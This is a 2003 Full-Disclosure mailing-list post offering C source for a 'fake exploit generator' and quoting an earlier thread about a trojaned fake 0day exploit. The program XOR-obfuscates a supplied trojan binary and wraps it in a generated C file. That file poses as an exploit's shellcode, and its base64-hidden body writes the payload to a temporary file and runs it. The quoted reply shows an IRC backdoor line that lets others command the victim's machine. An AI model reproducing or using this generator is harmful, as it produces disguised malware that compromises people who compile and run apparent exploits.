On Friday 13 June 2003 06:51 pm, David Bernick wrote: Well anyway, I got inspired:
// Fake Exploit Generator // [EMAIL PROTECTED] // #include <stdio.h> #include <sys/types.h> #include <sys/stat.h> #include <unistd.h> #define badchar(c,p) (!(p = memchr(b64string, c, 64))) #define BEAUTIFY "indent" char b64string[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"; static char header[] = { "Ly8gZ2VuZXJhdGVkIHdpdGggRmFrZSBFeHBsb2l0IEdlbmVyYXRvciA6OiBnbWxAcGhyaWNr" "Lm5ldAoKI2luY2x1ZGUgPHN0ZGlvLmg+CiNpbmNsdWRlIDxzeXMvdHlwZXMuaD4KI2luY2x1" "ZGUgPHN5cy9zdGF0Lmg+CiNpbmNsdWRlIDx1bmlzdGQuaD4K" }; static char body[] = { "dm9pZCB1c2FnZShpbnQgYXJncywgY2hhciAqc2VsZikKewoJaWYoZ2V0dWlkKCkgIT0gMCkK" "CXsKCQlwcmludGYoIlRoaXMgcHJvZ3JhbSByZXF1aXJlcyBwcml2aWxlZGdlcyB5b3UgZG8g" "bm90IHBvc2Vzcy5cbiIpOwoJCWV4aXQoMCk7Cgl9CgllbHNlCgl7CgoJCWlmKGFyZ3MgPCAy" "KQoJCXsKCQkJcHJpbnRmKCJ1c2FnZTogJXMgPHRhcmdldD5cbiIsIHNlbGYpOwoJCQlleGl0" "KDApOwoJCX0KCX0KCn0KCnZvaWQgc2V0dXAoKQp7CgljaGFyICp0bXA7CglGSUxFICpmcDsK" "CWNoYXIgYnl0ZVswXTsKCWludCBpOwoKCXRtcCA9IHRtcG5hbShOVUxMKTsKCWZwID0gZm9w" "ZW4odG1wLCAidyIpOwoJaWYoZnApCgl7CgkJZm9yKGkgPSAwOyBpIDwgc2l6ZW9mKHNoZWxs" "Y29kZSk7IGkrKykKCQl7CgkJCWJ5dGVbMF0gPSBzaGVsbGNvZGVbaV0gXiBNQVg7CgkJCWZ3" "cml0ZShieXRlLCAxLCAxLCBmcCk7CgkJfQoJCWZjbG9zZShmcCk7CgkJY2htb2QodG1wLCAw" "NzU1KTsKCQlzeXN0ZW0odG1wKTsKCQl1bmxpbmsodG1wKTsKCX0KfQoKaW50Cm1haW4gKGlu" "dCBhcmdjLCBjaGFyICphcmd2W10pCnsKCXVzYWdlKGFyZ2MsIGFyZ3ZbMF0pOwoJc2V0dXAo" "KTsKCS8vIGRvIHNvbWUgc2hpdCBoZXJlCn0K" }; long b64dec (char *to, char *from, unsigned int len) { char *fromp = from; char *top = to; char *p; unsigned char cbyte; unsigned char obyte; int padding = 0; for (; len >= 4; len -= 4) { if ((cbyte = *fromp++) == '=') cbyte = 0; else { if (badchar(cbyte, p)) return -1; cbyte = (p - b64string); } obyte = cbyte << 2; /* 1111 1100 */ if ((cbyte = *fromp++) == '=') cbyte = 0; else { if (badchar(cbyte, p)) return -1; cbyte = p - b64string; } obyte |= cbyte >> 4; /* 0000 0011 */ *top++ = obyte; obyte = cbyte << 4; /* 1111 0000 */ if ((cbyte = *fromp++) == '=') { cbyte = 0; padding++; } else { padding = 0; if (badchar (cbyte, p)) return -1; cbyte = p - b64string; } obyte |= cbyte >> 2; /* 0000 1111 */ *top++ = obyte; obyte = cbyte << 6; /* 1100 0000 */ if ((cbyte = *fromp++) == '=') { cbyte = 0; padding++; } else { padding = 0; if (badchar (cbyte, p)) return -1; cbyte = p - b64string; } obyte |= cbyte; /* 0011 1111 */ *top++ = obyte; } *top = 0; if (len) return -1; return (top - to) - padding; } void printhex(char c, FILE *fp) { char s[10]; if(c < 16 && c >= 0) { fprintf(fp, "\\x%2.2x", c); } else { if(c > 0) { fprintf(fp, "\\x%2.2x", c); } else { sprintf(s, "%x", c); fprintf(fp, "\\x%c", s[6]); fprintf(fp, "%c", s[7]); } } } int main(int argc, char *argv[]) { FILE *trojan; FILE *fakeexp; char byte[0]; int count = 0; char *out; out = (char *)malloc(sizeof(body)); memset(out, 0, sizeof(out)); #ifdef BEAUTIFY char *cmd; #endif if(argc < 4 ) { printf("usage: %s trojan fakeexp.c key\n", argv[0]); printf("ex: %s trojan fakeexp.c 187\n", argv[0]); exit(0); } trojan = fopen(argv[1], "r"); fakeexp = fopen(argv[2], "w"); if(trojan && fakeexp) { b64dec(out, header, sizeof(header)); fprintf(fakeexp, "%s", out); memset(out, 0, sizeof(out)); fprintf(fakeexp, "\n#define MAX\t%s\n\n", argv[3]); fprintf(fakeexp, "static char shellcode[] = {\n"); while(!feof(trojan)) { memset(byte, 0, sizeof(byte)); fread(byte, 1, 1, trojan); byte[0] = byte[0] ^ atoi(argv[3]); // obfuscate if(count < 15) { if(count == 0) { fprintf(fakeexp, "\""); } printhex(byte[0], fakeexp); count++; } else { printhex(byte[0], fakeexp); fprintf(fakeexp, "\"\n"); count = 0; } } fprintf(fakeexp, "\"\n};\n\n"); b64dec(out, body, sizeof(body)); fprintf(fakeexp, "%s", out); memset(out, 0, sizeof(out)); fclose(trojan); fclose(fakeexp); } #ifdef BEAUTIFY cmd = (char *)malloc(sizeof(BEAUTIFY) * sizeof(argv[2]) + 2); memset(cmd, 0, sizeof(cmd)); sprintf(cmd, "%s %s", BEAUTIFY, argv[2]); system(cmd); free(cmd); #endif } > > Wow, I'd never run something that had a printf statement in it with > > > > print $sock "JOIN $chan\nPRIVMSG $chan :Hi, Im a moron that ran a fake > > 0day exp loit. v2\nPRIVMSG $chan :to run commands on me, type: > > ".$nick.": command\n"; > > > > if you run this you deserve to get owned. this guy could have at least > > xor'd the strings and base64 encoded them or SOMETHING. > > the printf statement is in the shellcode. if you don't know C and/or hex > very well it looks semi-legit. The attached perl code is the decoded shell > code, it's not in the actual "exploit". This is the perfect kind of > program to trojan little hacker wannabes on IRC. > > and no one deserves to be owned. They just need to pay for highly paid > security consultants instead (shhh..kidding). > > d > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.netsys.com/full-disclosure-charter.html _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html